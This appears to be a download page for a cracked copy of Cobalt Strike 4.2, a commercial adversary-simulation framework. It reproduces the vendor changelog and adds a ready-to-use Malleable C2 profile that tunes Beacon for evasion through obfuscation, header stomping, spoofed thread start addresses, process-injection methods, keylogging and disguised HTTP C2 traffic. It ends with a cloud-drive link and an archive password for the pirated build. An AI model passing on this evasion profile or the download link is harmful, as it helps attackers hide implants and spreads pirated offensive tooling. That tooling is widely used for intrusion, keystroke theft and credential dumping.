Cobalt Strike 4.2 cracked version download (cobaltstrike4.2 cracked)

This release overhauls the user exploitation features, adds more in-memory flexibility options to Beacon, adds more behavioural flexibility to the post-exploitation features, and makes some nice changes to Malleable C2 as well.

Cobalt Strike pricing

A new Cobalt Strike license costs US$3,500 per user for one year. Renewing a license costs US$2,500 per user per year.

Cobalt Strike 4.2 changelog

Release date: November 6, 2020

English original

----------------
+ Refactored Beacon Reflective Loader and added mechanism to patch rDLL loader into
  Beacon (vs. shipping a static loader with the agent).
+ Added stage -> allocator (VirtualAlloc, HeapAlloc, or MapViewOfFile) to set
  which allocator Beacon's RDLL loader will use for the Beacon stage.
+ stage -> obfuscate now obfuscates .text section in rDLL package
+ Fixed client NPE triggered by missing download start metadata
+ Added Cobalt Strike client IP address to join message in events.log
+ Added -Dcobaltstrike.server_bindto=address (in teamserver script, java command) 
  to change the address the team server will bind to. Default is 0.0.0.0.
+ Team server now uses a more resilient process to write its data model
+ Screenshot tool now reports user, session, and active window title.
+ Updated View -> Screenshots and other UX to use screenshot context info
+ Added color highlighting to View -> Screenshots
+ http-post C2 handler now detects another type of corruption.
+ Added color highlighting to View -> Downloads
+ Added color highlighting to View -> Keystrokes
+ Keystroke logger now reports user and session information
+ Updated View -> Keystrokes and other UX to use keylogger context info
+ Added option to "remove" screenshot or keystrokes from interface via menu
+ Added screenshots.log to logs/[date]/[target]/ folder with screenshot meta-data
+ Stripped color codes from keystroke logs and added desktop session/user context
+ Added Save option to keystroke and screenshot browser right-click menu.
+ Split screenshot into two commands: screenshot and screenwatch. screenshot takes 
  a single screenshot. screenwatch takes periodic screenshots until terminated 
  with jobkill command.
+ Added printscreen command to take screenshot by forcing PrintScr keypress and 
  grabbing contents from the keyboard.
+ Added post-ex -> thread_hint to spawn threads with specified module!func+offset
  start address. Affects the browserpivot, keylogger, net, portscan, and 
  powerpick/psinject post-ex DLLs.
+ Added post-ex -> keylogger to set keystroke logging method. Current options are
  SetWindowsHookEx and GetAsyncKeyState.
+ post-ex -> obfuscate now enables behavior to mask DLL strings, when not needed, 
  in execute-assembly, keystroke logger, screenshot, and SSH client DLLs.
+ Added stage -> magic_mz_[arch] and magic_pe to set the MZ and PE header values to
  something else in Beacon's DLL package. Read the docs on this one as the MZ 
  values have to be valid executable instructions that [should] repair any changes 
+ Added a c2lint warning for operation-impacting high dns_ttl values.
+ HTTP and DNS C2 specific configs no longer show up outside of their payloads
+ Beacon now detects http-post block request failures and tries requests again.
+ Rewrote how DNS C2 caches and clears cache of conversations and entries. This 
  fixes DNS C2 stability/performance for servers that send parent domain before 
  each FQDN request. It looked like a checkin to Beacon and was wreaking havoc.
+ Implemented remote-exec wmi as a BOF.
+ Max length of useragent field in Malleable C2 profile is now 255 characters.
+ Fixed bug with [possible] domain truncation in DNS/HTTP Beacon config if the total
  length of the specified domains exceeded 255 characters.
+ 8+ years in and I think y'all deserve some generosity from the Cobalt Strike 
  product. As my kind act, I have doubled the max size of the http-get.client and 
  http-post.client programs in your profile.
+ Added headers_remove global option to force Beacon's WinINet to remove specified
  headers late in the HTTP/S transaction process.
+ Added a "this goes into your config" notice to the HTTP Beacon proxy config dialog
+ Added an empty BOF content sanity check to &beacon_inline_execute
+ Added rportfwd_local to create a port forward that initiates connection and routes
  from Beacon to team server onwards through the requester's Cobalt Strike client.
+ Implemented spunnel and spunnel_local commands to spawn shellcode and tunnel 
  connection to specified controller. spunnel_local forwards via Cobalt Strike client
  and spunnel forwards via the team server.
+ Added pivot socket read governor to limit read loop to max ~4s per Beacon checkin.
+ Bug fix to link module read functions
+ Multiple improvements to existing rportfwd implementation.
+ rportfwd (and spunnel) are now friendly to having the rportfwd for a session/port
  redefined without the need to release the bound port and rebind it.
+ Pivot socket writes now happen on a connection specific thread to prevent session
  deadlock if the team server-side relayed connection becomes unresponsive or blocked.
+ Fixed a handle leak in socks pivoting sub-system
+ DNS Beacon C2 now drops requests that are not A, AAAA, or TXT.
+ Added post-ex -> pipename Malleable C2 option to change post-ex job output pipename
+ Added set ssh_pipename to set the named pipe used by Cobalt Strike's SSH sessions
+ Proxy server config parser now strips trailing / (which impacted the port value).
+ Any # in Malleable C2 pipename options is now replaced with a random hex digit.
+ Fixed BeaconUseToken BOF API to return a BOOL as documented
+ Added BeaconSpawnTemporaryProcess BOF API. 
+ Fixed parser to extract creds from dcsync [domain] output
+ Made changes to avoid unneeded VirtualProtect when startrwx/userwx in process-inject
  block are both true.
+ BOF executable memory now honors startrwx/userwx hints from process-inject block
+ Added script hook to enable use of alt. mimikatz, provided by us, between releases
+ Updated to Mimikatz 2.2.0-20200918-fix
+ Greatly reduced the size of mimikatz-min and mimikatz-chrome DLLs.
+ Added chromedump alias to run dpapi::chrome in mimikatz.
+ Improved recoverability of parent Beacon if a child TCP Beacon process "fails"
+ Added Vista+ check to getsystem in Beacon console.
+ Browser Pivot HTTP Proxy is now manageable via View -> Proxy Pivots
+ Added &bmimikatz_small to Aggressor Script.
+ Moved capability to query network interfaces to a BOF and out of core Beacon
+ Added some ptr cleanup to post-ex RDLL loaders.
+ Fixed SSH agent bug where session was sometimes incorrectly reported as elevated
+ Added set data_jitter "X" to add noise to Beacon's HTTP/S beaconing by adding
  up to X (random each time) random bytes to the output of each http-get and 
  http-post response 
+ c2lint warns for a bad process-inject -> execute config for Windows XP-era systems.
+ execute-assembly now stomps DOS header when post-ex -> obfuscate is true
+ Added c2lint check for dangerous headers to overwrite with http-config.
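As an added example, not part of this page and not shipped with Cobalt Strike, the profile fragment below shows where the 4.2 Malleable C2 options named in the changelog sit in a profile. Only the option names and the allowed values come from the changelog; the URIs, headers, pipe names, spawnto paths, the thread_hint target and the user agent are placeholders picked for illustration, and headers_remove is placed at the top level because the changelog calls it a global option. Run c2lint over the profile before loading it on a team server.

```text
# Example Malleable C2 profile fragment for Cobalt Strike 4.2 (added here, not vendor code).
# Every value except the option names is an illustrative placeholder.

set sleeptime   "60000";
set jitter      "20";
set data_jitter "50";                  # 4.2: pad each http-get/http-post response
                                       #      with up to 50 random bytes
set useragent   "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36";
                                       # 4.2: useragent may now be up to 255 chars
set pipename     "msagent_##";         # 4.2: each '#' becomes a random hex digit
set ssh_pipename "postex_ssh_####";    # 4.2: pipe used by SSH sessions
set headers_remove "Accept-Encoding, Connection";  # 4.2: removed late by WinINet
set dns_ttl      "1";                  # keep low; c2lint now warns on high values

stage {
    set allocator    "HeapAlloc";      # 4.2: VirtualAlloc | HeapAlloc | MapViewOfFile
    set obfuscate    "true";           # 4.2: now also obfuscates the .text section
    set userwx       "false";
    set magic_mz_x86 "MZRE";           # 4.2: header bytes must remain valid code
    set magic_mz_x64 "MZAR";           #      (see the note below the block)
    set magic_pe     "PE";
}

post-ex {
    set spawnto_x86 "%windir%\\syswow64\\svchost.exe";
    set spawnto_x64 "%windir%\\sysnative\\svchost.exe";
    set obfuscate   "true";            # 4.2: masks strings in execute-assembly,
                                       #      keylogger, screenshot and SSH DLLs;
                                       #      execute-assembly also stomps the DOS header
    set pipename    "postex_####";     # 4.2: post-ex job output pipe
    set thread_hint "ntdll.dll!RtlUserThreadStart+0x1000";  # 4.2: module!func+offset
    set keylogger   "SetWindowsHookEx";  # 4.2: or GetAsyncKeyState
}

process-inject {
    set allocator "NtMapViewOfSection";
    set startrwx  "false";             # 4.2: BOF memory honours these hints too
    set userwx    "false";
    set min_alloc "17500";
    transform-x86 { prepend "\x90\x90"; }
    transform-x64 { prepend "\x90\x90"; }
    execute {
        CreateThread "ntdll!RtlUserThreadStart";
        NtQueueApcThread-s;
        CreateRemoteThread;
        RtlCreateUserThread;
    }
}

http-get {
    set uri "/api/v1/status";
    client {
        header "Accept" "*/*";
        metadata { base64url; parameter "session"; }
    }
    server {
        header "Content-Type" "application/json";
        output { base64; print; }
    }
}

http-post {
    set uri "/api/v1/submit";
    client {
        header "Content-Type" "application/octet-stream";
        id     { parameter "id"; }
        output { print; }
    }
    server {
        header "Content-Type" "application/json";
        output { base64; print; }
    }
}
```

The magic_mz values above are the stock ones, and they illustrate the constraint the changelog warns about: the first bytes of the reflective DLL are executed before the loader's real entry, so they have to be valid instructions that leave the CPU state unchanged. On x86, "M" and "Z" (0x4D, 0x5A) decode as dec ebp and pop edx, and "R" and "E" (0x52, 0x45) as push edx and inc ebp, which undo them. On x64, 0x4D is a REX prefix, so "MZ" decodes as pop r10 and "AR" (0x41, 0x52) as push r10. Any replacement must keep that property for both architectures. The -Dcobaltstrike.server_bindto property mentioned in the changelog is a JVM flag in the teamserver launcher script, not a profile option, so it does not appear here.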

Cobalt Strike 4.2 cracked version download link

雨苁 cloud drive: w.ddosi.workers.dev
Archive password: www.ddosi.org

Never use this for illegal or criminal activity.
